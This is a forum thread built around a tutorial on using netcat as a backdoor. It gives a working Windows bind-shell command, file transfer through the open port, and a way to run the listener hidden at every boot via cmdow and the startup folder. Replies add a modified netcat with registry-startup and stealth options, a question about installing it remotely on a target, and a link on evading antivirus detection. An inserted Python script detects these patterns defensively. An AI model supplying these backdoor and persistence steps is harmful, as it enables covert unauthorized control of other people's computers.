I was starting to search for this very topic and you explained it well. Thanks again. Keep up the great work!
I was recently looking for tutorials on google on how to use netcat as a backdoor. I thought I might as well post what I learned. I personally ran netcat on my linux computer and used it as the attacker, and used my windows computer as the target computer.
--------------------------------------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~ NetCat Tutorial ~~~~~~~~~~~~~~~~~~~~~
--------------------------------------------------------------------------------------------------------
Setting up and Connecting to a "target" computer
First off, make sure you have netcat installed on your "attacking" computer and your "target" computer. It does not matter if the computer is running unix or windows.
To be able to connect to this "target" you must first start netcat on the "target" computer so your "attacking" computer can connect.
Windows: Open up a command prompt and make sure you are in the same directory as nc.exe (netcat). Then type "nc -L -p 10002 -d -e cmd.exe"
This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer, open up a command prompt and type "nc 192.168.1.1 10002". This will connect you to your "target's" computer.
(I have not tested this on linux, I have only backdoored windows so I am not positive these commands work properly)
Unix: Open up a konsole. Then type "netcat -L -p 10002 -d -e konsole"
This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer, open up a command prompt and type "netcat 192.168.1.1 10002". This will connect you to your "target's" computer.
-L Tells netcat to not close and wait for a connection
-p Tells netcat which port to listen on
-d Tells netcat to detach from the process we want it to run
-e Tells netcat which program to run after the port is connected
Transferring files through netcat
To send a file through netcat, enter the command "start nc.exe -l -p 1234 >file.txt" after you have connected to a windows machine. The -p 1234 is the port netcat listens on, >file.txt is the file to be received through netcat.
Enter this in a konsole on the "attacking" computer "netcat 192.168.1.1 1234 <file.txt".
Running netcat on startup hidden
Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it in the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
Now every time the computer boots netcat will start hidden.
--------------------------------------------------------------------------------------------------------
Package with all files used in the tutorial.
http://rapidshare.com/files/45658237...or.tar.gz.html
Mirrors
http://z13.zupload.com/download.php?...filepath=79690
http://www.sendspace.com/file/526t92
Disclaimer
This tutorial is for educational use only, please only use this information in a closed lab environment.
Credits
www.ol-service.com/sikurezza/doc/netcat_eng.pdf
A couple of excerpts and a lot of information come from this pdf
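As an added defensive example that is not part of the original post: a small Python script that tags constructed process records by the netcat usage patterns the tutorial describes (listen plus -e shell, -L re-listen, -d detach, and a cmdow /HID launch from the startup folder). The record layout, image names and sample command lines are assumptions, not data from any real host.

```python
import shlex
from typing import Dict, List, Tuple

# Constructed sample process records (pid, image, command line), shaped like an
# export from a process-audit tool. They mirror the tutorial's commands plus
# benign noise; none were captured from a real machine.
SAMPLE_PROCESSES: List[Tuple[int, str, str]] = [
    (1204, "nc.exe", "nc -L -p 10002 -d -e cmd.exe"),
    (1377, "nc.exe", "nc.exe -l -p 1234"),
    (1410, "nc.exe", "nc 192.168.1.1 10002"),
    (1500, "cmdow.exe", "cmdow /RUN /HID C:\\start.bat"),
    (2001, "chrome.exe", "chrome.exe --type=renderer"),
]

NETCAT_IMAGES = {"nc", "nc.exe", "netcat", "ncat", "wnc", "wnc.exe"}
SHELLS = {"cmd.exe", "cmd", "sh", "bash", "konsole", "powershell.exe", "powershell"}


def classify(image: str, cmdline: str) -> List[str]:
    """Tag one process record with the netcat-backdoor behaviours it matches."""
    tags: List[str] = []
    tokens = shlex.split(cmdline, posix=False)  # keep Windows paths intact
    flags = {t for t in tokens[1:] if t.startswith("-")}
    if image.lower() in NETCAT_IMAGES:
        listening = bool(flags & {"-l", "-L"})
        # Program handed to -e: the tutorial's "-e cmd.exe" yields a bind shell.
        exec_prog = None
        if "-e" in tokens and tokens.index("-e") + 1 < len(tokens):
            raw = tokens[tokens.index("-e") + 1]
            exec_prog = raw.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
        if listening and exec_prog in SHELLS:
            tags.append("bind_shell")
        elif listening:
            tags.append("listener")  # e.g. the ">file.txt" receive trick
        else:
            tags.append("outbound_connect")
        if "-L" in flags:
            tags.append("relisten")  # keeps listening after the client disconnects
        if "-d" in flags:
            tags.append("detached")  # no visible console window
    # cmdow /HID is how the tutorial hides the startup batch file's window.
    if image.lower() == "cmdow.exe" and any(t.upper() == "/HID" for t in tokens):
        tags.append("hidden_window_launch")
    return tags


def scan(records: List[Tuple[int, str, str]]) -> Dict[int, List[str]]:
    """Return {pid: tags} for every record that matched at least one behaviour."""
    return {pid: classify(img, cmd) for pid, img, cmd in records if classify(img, cmd)}


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_PROCESSES).items():
        print(pid, ", ".join(tags))
```

In practice the records would come from process-creation auditing; the same tags can be correlated with a listening-port inventory to confirm the bind shell is actually reachable.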
Thanks. :-)
NetCat, great tool. Joseph, nice work, and it's good to see there is still interest in such an old tool. I've added more functions to the original program; here is my help list:
C:\MyCat 2.0\Release>wnc -h
[WildCat (wnc - v1.0) NT]
connect to somewhere: wnc [-options] hostname port[s] [ports] ...
listen for inbound: wnc -l -p port [options] [hostname] [port]
options:
-b beep sound a internal beep when connected
-B chatbeep sound a internal beep on inbound messages
-c commands give commands for fun stuff
-d detach detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h help this cruft
-H examples shows some usage examples
-i secs delay interval for lines sent, ports scanned
-l listen listen mode, for inbound connects
-L relisten listen harder, re-listen on socket close
-n numeric numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-P password password protect inbound/outbound connections
-r randomize randomize local and remote ports
-R reconnect to loop outbound connections in seconds
-s addr local source address
-S startup add startup key to registry
-t telnet answer TELNET negotiation
-u upd UDP mode
-v verbose verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z scanning zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
The source code is out there; if you know any C/C++ you can build your own version, adding the functions you see fit.
peace
ahh good old netcat with a nice tutorial. Thanks
So netcat is basically a trojan? The main thing for me is getting netcat installed on the target PC. How do I do that without actually sitting at the target computer?
Even the crappiest antivirus can detect netcat, so it's only useful for a one shot deal where you don't care if your attack is logged.
Thanksthx
"Even the crappiest antivirus can detect netcat so its only useful for a one shot deal where you don't care if your attack is logged."
A good article on how to avoid AV detection by altering Netcat's signature can be found at:
http://packetstormsecurity.org/paper...ack_Netcat.pdf
Fletch